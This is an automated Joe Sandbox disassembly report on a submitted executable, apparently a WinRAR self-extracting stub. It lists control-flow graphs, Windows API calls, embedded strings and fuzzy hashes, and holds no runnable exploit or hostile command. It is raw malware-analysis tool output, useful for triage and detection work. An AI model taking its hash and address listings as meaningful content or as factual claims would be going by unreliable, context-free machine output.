26 API calls 28950 272369 28948->28950 29391 272ed0 26 API calls 28950->29391 28951->28948 28953 272374 29392 2724d9 26 API calls 28953->29392 28970 27e927 28969->28970 28971 27e931 28970->28971 29393 2793d7 110 API calls __EH_prolog3_GS 28970->29393 28971->28708 28973->28733 28974->28733 28976 28028f _abort 28975->28976 28983 280152 28976->28983 28979 271a66 26 API calls 28980 2802b4 28979->28980 28981 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28980->28981 28982 2802bf 28981->28982 28982->28756 28984 2725a4 26 API calls 28983->28984 28985 2801c7 28984->28985 28985->28979 28986->28777 28987->28770 28989 29430c __EH_prolog3_GS 28988->28989 29004 282117 28989->29004 28992 284318 53 API calls 28993 294342 28992->28993 28994 286a25 53 API calls 28993->28994 28995 29434c 28994->28995 28996 271a66 26 API calls 28995->28996 28997 29435b 28996->28997 29008 293ec5 28997->29008 29000 271a66 26 API calls 29001 294375 29000->29001 29002 295787 5 API calls 29001->29002 29003 288665 29002->29003 29003->28725 29005 282124 29004->29005 29006 27769f 45 API calls 29005->29006 29007 282136 29006->29007 29007->28992 29009 293ed1 __EH_prolog3_GS 29008->29009 29010 2714a7 28 API calls 29009->29010 29011 293edd 29010->29011 29012 293572 21 API calls 29011->29012 29013 293eec 29012->29013 29014 271a66 26 API calls 29013->29014 29015 293ef4 29014->29015 29016 295787 5 API calls 29015->29016 29017 293ef9 29016->29017 29017->29000 29018->28793 29019->28793 29020->28796 29023 277e27 __EH_prolog3_GS 29021->29023 29193 277bfc 29023->29193 29024 277e6c 29025 295787 5 API calls 29024->29025 29026 277ecf 29025->29026 29026->28811 29027 277e68 29027->29024 29030 277ed2 29027->29030 29032 277ebe 29027->29032 29198 277bd6 30 API calls 29027->29198 29029 271a66 26 API calls 29029->29024 29030->29032 29199 27adaa CompareStringW 29030->29199 29032->29029 29042 281095 29033->29042 29034 281256 29036 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29034->29036 29035 

Control-flow Graph
                                        APIs
                                          • Part of subcall function 00286D7B: GetModuleHandleW.KERNEL32(kernel32,D946AC94), ref: 00286DC7
                                          • Part of subcall function 00286D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00286DD9
                                          • Part of subcall function 00286D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00286E03
                                          • Part of subcall function 00281309: __EH_prolog3.LIBCMT ref: 00281310
                                          • Part of subcall function 00281309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002817FB,?,?,\\?\,D946AC94,?,?,?,00000000,002AA279,000000FF), ref: 00281319
                                          • Part of subcall function 0028F4D4: OleInitialize.OLE32(00000000), ref: 0028F4ED
                                          • Part of subcall function 0028F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028F524
                                          • Part of subcall function 0028F4D4: SHGetMalloc.SHELL32(002C532C), ref: 0028F52E
                                        • GetCommandLineW.KERNEL32 ref: 00294608
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0029464F
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00294661
                                        • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0029466F
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0029467D
                                          • Part of subcall function 0028FC38: __EH_prolog3.LIBCMT ref: 0028FC3F
                                          • Part of subcall function 00293EFC: __EH_prolog3_GS.LIBCMT ref: 00293F03
                                          • Part of subcall function 00293EFC: SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00293F1B
                                          • Part of subcall function 00293EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00293F86
                                          • Part of subcall function 002851BF: _wcslen.LIBCMT ref: 002851E3
                                        • UnmapViewOfFile.KERNEL32(00000000,002C5430,00000400,002C5430,002C5430,00000400,00000000,00000001,?,00000000), ref: 002946CC
                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002946D3
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,002B9698,00000000), ref: 0029472F
                                        • GetLocalTime.KERNEL32(?), ref: 0029473A
                                        • _swprintf.LIBCMT ref: 00294779
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0029478E
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00294795
                                        • LoadIconW.USER32(00000000,00000064), ref: 002947AC
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00294803
                                        • Sleep.KERNELBASE(00001B58), ref: 00294834
                                        • DeleteObject.GDI32 ref: 00294858
                                        • DeleteObject.GDI32(00050D57), ref: 00294868
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                          • Part of subcall function 002919EE: __EH_prolog3_GS.LIBCMT ref: 002919F5
                                        • CloseHandle.KERNEL32 ref: 002948AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T,$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                        • API String ID: 3142445277-246775543
                                        • Opcode ID: 781579dd803830d633f23b075ba56370645f84a1345a251353c9c7e9b3db6fc9
                                        • Instruction ID: 3519402e2a4fac0b4e98a9cce6cc3cf43f7cacc5e4c5e69b2a8ae0d63b9b41d1
                                        • Opcode Fuzzy Hash: 781579dd803830d633f23b075ba56370645f84a1345a251353c9c7e9b3db6fc9
                                        • Instruction Fuzzy Hash: C491DE70524750AFC720BF64EC49FAB77ECAB49700F40492DF54992291EB74E8A5CF21

                                        Control-flow Graph
                                        control_flow_graph 725 28ebd3-28ebf0 FindResourceW 726 28ecec 725->726 727 28ebf6-28ec07 SizeofResource 725->727 729 28ecee-28ecf2 726->729 727->726 728 28ec0d-28ec1c LoadResource 727->728 728->726 730 28ec22-28ec2d LockResource 728->730 730->726 731 28ec33-28ec48 GlobalAlloc 730->731 732 28ec4e-28ec57 GlobalLock 731->732 733 28ece4-28ecea 731->733 734 28ecdd-28ecde GlobalFree 732->734 735 28ec5d-28ec7b call 296c70 CreateStreamOnHGlobal 732->735 733->729 734->733 738 28ec7d-28ec9f call 28eb06 735->738 739 28ecd6-28ecd7 GlobalUnlock 735->739 738->739 744 28eca1-28eca9 738->744 739->734 745 28ecab-28ecbf GdipCreateHBITMAPFromBitmap 744->745 746 28ecc4-28ecd2 744->746 745->746 747 28ecc1 745->747 746->739 747->746
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00290845,00000066), ref: 0028EBE6
                                        • SizeofResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EBFD
                                        • LoadResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC14
                                        • LockResource.KERNEL32(00000000,?,?,?,00290845,00000066), ref: 0028EC23
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00290845,00000066), ref: 0028EC3E
                                        • GlobalLock.KERNEL32(00000000), ref: 0028EC4F
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028EC73
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0028ECD7
                                          • Part of subcall function 0028EB06: GdipAlloc.GDIPLUS(00000010), ref: 0028EB0C
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028ECB8
                                        • GlobalFree.KERNEL32(00000000), ref: 0028ECDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                        • String ID: PNG
                                        • API String ID: 211097158-364855578
                                        • Opcode ID: 00eaa323269f3fe69467d77b409a72bedbd2f5236884fa91981816e746213d4b
                                        • Instruction ID: 1031e79bee05b8eab204ff992586b31f109d30c56b466ece2d2496d9527378f7
                                        • Opcode Fuzzy Hash: 00eaa323269f3fe69467d77b409a72bedbd2f5236884fa91981816e746213d4b
                                        • Instruction Fuzzy Hash: 54315E75A11202ABDB10AF61ED4CD2BBFACFF45754B15052AF916D22A1EF31D821CB60
                                        APIs
                                          • Part of subcall function 00288781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,D946AC94,00000007,?,?,?,00288751,?,?,?,?,0000000C,00274426), ref: 0028879D
                                        • _wcslen.LIBCMT ref: 0028395A
                                        • __fprintf_l.LIBCMT ref: 00283AA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                        • API String ID: 1796436225-285229759
                                        • Opcode ID: 7ffcea3c7c17757cf834fdc9367277dec0f138ae27eb4a3e735a4b66ff53fbc4
                                        • Instruction ID: b38cbeaa1ed3b52f3138bd7f9b63f07c4892c49ac6265262b34c4e0d3de57e61
                                        • Opcode Fuzzy Hash: 7ffcea3c7c17757cf834fdc9367277dec0f138ae27eb4a3e735a4b66ff53fbc4
                                        • Instruction Fuzzy Hash: 5F52F675921259AFDF24EFA8CC45AEDB7B4FF04B10F10052AE805EB2C1EB719A64CB50

                                        Control-flow Graph
                                        control_flow_graph 1006 27f826-27f841 call 2957d8 1009 27f847-27f84d 1006->1009 1010 27f925-27f935 FindNextFileW 1006->1010 1011 27f851-27f864 FindFirstFileW 1009->1011 1012 27f84f 1009->1012 1013 27f937-27f946 GetLastError 1010->1013 1014 27f948-27f9fa call 2725c3 call 2714a7 call 28229d call 271a66 call 287c44 * 3 1010->1014 1011->1014 1015 27f86a-27f88e call 28169a 1011->1015 1012->1011 1016 27f91d-27f920 1013->1016 1019 27f9ff-27fa0a call 295787 1014->1019 1025 27f890-27f897 1015->1025 1026 27f8ac-27f8b6 1015->1026 1016->1019 1029 27f89c-27f8aa FindFirstFileW 1025->1029 1030 27f899 1025->1030 1031 27f8fd-27f900 1026->1031 1032 27f8b8-27f8d3 1026->1032 1029->1026 1030->1029 1031->1014 1034 27f902-27f90b GetLastError 1031->1034 1035 27f8d5-27f8ee call 2719a9 1032->1035 1036 27f8f4-27f8fc call 295726 1032->1036 1039 27f90d-27f910 1034->1039 1040 27f91b 1034->1040 1035->1036 1036->1031 1039->1040 1044 27f912-27f915 1039->1044 1040->1016 1044->1040 1047 27f917-27f919 1044->1047 1047->1016
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F830
                                        • FindFirstFileW.KERNELBASE(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F859
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F8A4
                                        • GetLastError.KERNEL32(?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F902
                                        • FindNextFileW.KERNEL32(?,?,00000274,0027F733,000000FF,00000049,00000049,?,?,0027A684,?,?,00000000,?,?,?), ref: 0027F92D
                                        • GetLastError.KERNEL32(?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049,?,00000000), ref: 0027F93A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                        • String ID:
                                        • API String ID: 3831798110-0
                                        • Opcode ID: a57e6b2f4e7bf4807325cd940e44dd60c6cfb9df065d5fe9d8cecfad8bc15a7f
                                        • Instruction ID: 5176c06063edca632fe663cf018f64465b67cab9c5e13da352cb8bbe2ad6512b
                                        • Opcode Fuzzy Hash: a57e6b2f4e7bf4807325cd940e44dd60c6cfb9df065d5fe9d8cecfad8bc15a7f
                                        • Instruction Fuzzy Hash: BA514371915619DFCF54DF64D988AEDB7B8BF09320F1042AAE519E3290DB30AAA4CF50
                                        APIs
                                        • _wcslen.LIBCMT ref: 0027C342
                                          • Part of subcall function 00282095: __EH_prolog3_GS.LIBCMT ref: 0028209C
                                          • Part of subcall function 002757C0: __EH_prolog3.LIBCMT ref: 002757C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3H_prolog3__wcslen
                                        • String ID: __tmp_reference_source_
                                        • API String ID: 1523997010-685763994
                                        • Opcode ID: 2ddffb9fe3dedf9682bc1363f1151534b08e4a639afbd0d301fedbf4b017f296
                                        • Instruction ID: fa0fa8280502290c15950c93c58495e6105decf8e15c8509bbd6e34cd2a390d5
                                        • Opcode Fuzzy Hash: 2ddffb9fe3dedf9682bc1363f1151534b08e4a639afbd0d301fedbf4b017f296
                                        • Instruction Fuzzy Hash: 36D2E57092428A9FDF29DF74C890BEEBBB4BF05304F14855EE49E97241DB30A969CB50
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002,00000000), ref: 0029ECCB
                                        • TerminateProcess.KERNEL32(00000000,?,0029EC80,00000000,002B6F40,0000000C,0029EDD7,00000000,00000002,00000000), ref: 0029ECD2
                                        • ExitProcess.KERNEL32 ref: 0029ECE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 935525420e971c33510c60226e70061257f107c7d5641739675a636e91a2947b
                                        • Instruction ID: 4fb8fe43f544fb32ed441bf2ce004c2fc79a68c7d07452d3eeb74f4ccf034ed8
                                        • Opcode Fuzzy Hash: 935525420e971c33510c60226e70061257f107c7d5641739675a636e91a2947b
                                        • Instruction Fuzzy Hash: 85E0B632150608AFCF11AF54EE0DA587B69EF52391F150424F945AA222CF36EDA2DB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 356b5361dd64e6f715d81803efe2377399896979182c56f88cd7690f92bb34f9
                                        • Instruction ID: e45b8c86407771d38c0f3139da580d45f546e25d77ab19fc6702fff1f3eb19bc
                                        • Opcode Fuzzy Hash: 356b5361dd64e6f715d81803efe2377399896979182c56f88cd7690f92bb34f9
                                        • Instruction Fuzzy Hash: 94E1D3755193458FDB25EF28C884B5BBBE4BF88308F08456DEC889B382D774E964CB52
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0029090A
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000000), ref: 00290A18
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00290A57
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00290A71
                                        • IsDialogMessageW.USER32(?,?), ref: 00290A84
                                        • TranslateMessage.USER32(?), ref: 00290A92
                                        • DispatchMessageW.USER32(?), ref: 00290A9C
                                        • EndDialog.USER32(?,00000001), ref: 00290ADE
                                        • GetDlgItem.USER32(?,00000068), ref: 00290B04
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00290B1F
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC6C8), ref: 00290B32
                                        • SetFocus.USER32(00000000), ref: 00290B39
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00290C20
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00290C4C
                                        • GetTickCount.KERNEL32 ref: 00290C79
                                        • GetLastError.KERNEL32(?,00000011), ref: 00290CD5
                                        • GetCommandLineW.KERNEL32 ref: 00290DF9
                                        • _wcslen.LIBCMT ref: 00290E06
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,002C5430,00000400,00000001,00000001), ref: 00290E85
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00290EA3
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00290EDC
                                        • WaitForInputIdle.USER32(?,00002710), ref: 00290F0B
                                        • Sleep.KERNEL32(00000064), ref: 00290F25
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,002C5430,00000400), ref: 00290F61
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,002C5430,00000400), ref: 00290F6D
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00291072
                                          • Part of subcall function 00271E1F: GetDlgItem.USER32(?,?), ref: 00271E34
                                          • Part of subcall function 00271E1F: ShowWindow.USER32(00000000), ref: 00271E3B
                                        • SetDlgItemTextW.USER32(?,00000065,002AC6C8), ref: 0029108A
                                        • GetDlgItem.USER32(?,00000065), ref: 00291093
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002910A2
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00291422
                                        • EndDialog.USER32(?,00000001), ref: 00291436
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002910B1
                                          • Part of subcall function 0028E265: __EH_prolog3_GS.LIBCMT ref: 0028E26C
                                          • Part of subcall function 0028E265: ShowWindow.USER32(?,00000000,00000038), ref: 0028E294
                                          • Part of subcall function 0028E265: GetWindowRect.USER32(?,?), ref: 0028E2D8
                                          • Part of subcall function 0028E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 0028E373
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0029114F
                                        • SendMessageW.USER32(?,00000080,00000001,0001041B), ref: 00291284
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050D57), ref: 0029129D
                                        • GetDlgItem.USER32(?,00000068), ref: 002912A6
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002912BE
                                        • GetDlgItem.USER32(?,00000066), ref: 002912E6
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0029135D
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00291371
                                        • EnableWindow.USER32(?,00000000), ref: 002915A7
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002915E8
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0029160D
                                          • Part of subcall function 00291D4F: __EH_prolog3_GS.LIBCMT ref: 00291D59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                        • String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S,$LICENSEDLG$STARTDLG$\S,$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp$J)
                                        • API String ID: 3616063595-1258988733
                                        • Opcode ID: c995d54ba933fa9ef122a58af09b2294594f91cbc89cf36f5b897eb0234b9db6
                                        • Instruction ID: 57dba16cdbed5563d5818df07cb1e690591c390a5e2b5a3a62acd2dc2333fdea
                                        • Opcode Fuzzy Hash: c995d54ba933fa9ef122a58af09b2294594f91cbc89cf36f5b897eb0234b9db6
                                        • Instruction Fuzzy Hash: 0B72C570824359AEEF21EB64DC89FED7BB8AF05700F004199F509B7192DBB45AA4CF21

                                        Control-flow Graph
control_flow_graph 470 286d7b-286dd1 call 295b20 GetModuleHandleW 473 286e28-28708c 470->473 474 286dd3-286de3 GetProcAddress 470->474 475 28719b 473->475 476 287092-28709d call 29e50e 473->476 477 286dfd-286e0d GetProcAddress 474->477 478 286de5-286dfb 474->478 481 28719d-2871be call 2813f9 call 282117 475->481 476->475 486 2870a3-2870b8 call 2813f9 476->486 477->473 480 286e0f-286e24 477->480 478->477 480->473 493 2871c0-2871cc call 28067e 481->493 494 2870ba 486->494 495 2870bd-2870d5 CreateFileW 486->495 502 2871ce-2871dc call 286c5e 493->502 503 287203-287234 call 2714a7 call 28229d call 271a66 call 27ed1f 493->503 494->495 497 2870db-2870e7 SetFilePointer 495->497 498 287186-287199 CloseHandle call 271a66 495->498 497->498 500 2870ed-287107 ReadFile 497->500 498->481 500->498 504 287109-287114 500->504 502->503 515 2871de-287201 CompareStringW 502->515 534 287239-28723c 503->534 508 28711a-28714d call 2714a7 504->508 509 2873f2-2873f7 call 295ce1 504->509 518 287161-287174 call 286366 508->518 515->503 519 28723e-287242 515->519 528 28714f-287156 518->528 529 287176-287181 call 271a66 * 2 518->529 519->493 523 287248 519->523 526 28724c-287250 523->526 530 287252 526->530 531 287296-287298 526->531 532 287158 528->532 533 28715b-28715c call 286c5e 528->533 529->498 538 287254-28728a call 2714a7 call 28229d call 271a66 call 27ed1f 530->538 535 2873bd-2873ef call 271a66 * 2 call 295734 531->535 536 28729e-2872b1 call 282187 call 28067e 531->536 532->533 533->518 534->519 540 28724a 534->540 555 287332-287366 call 286a25 AllocConsole 536->555 556 2872b3-287330 call 286c5e * 2 call 284318 call 286a25 call 284318 call 2714a7 call 28ecf5 call 271549 536->556 571 28728c-287290 538->571 572 287294 538->572 540->526 568 287368-2873a7 GetCurrentProcessId AttachConsole call 287441 call 287436 GetStdHandle WriteConsoleW Sleep FreeConsole 555->568 569 2873ad 555->569 573 2873b0-2873b7 call 271549 ExitProcess 556->573 568->569 569->573 571->538 577 287292 571->577 572->531 577->531
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32,D946AC94), ref: 00286DC7
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00286DD9
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00286E03
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002870CA
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002870DF
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 002870FF
                                        • CloseHandle.KERNEL32(00000000), ref: 00287187
                                        • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 002871F8
                                        • AllocConsole.KERNEL32 ref: 0028735E
                                        • GetCurrentProcessId.KERNEL32 ref: 00287368
                                        • AttachConsole.KERNEL32(00000000), ref: 0028736F
                                        • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0028738F
                                        • WriteConsoleW.KERNEL32(00000000), ref: 00287396
                                        • Sleep.KERNEL32(00002710), ref: 002873A1
                                        • FreeConsole.KERNEL32 ref: 002873A7
                                        • ExitProcess.KERNEL32 ref: 002873B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
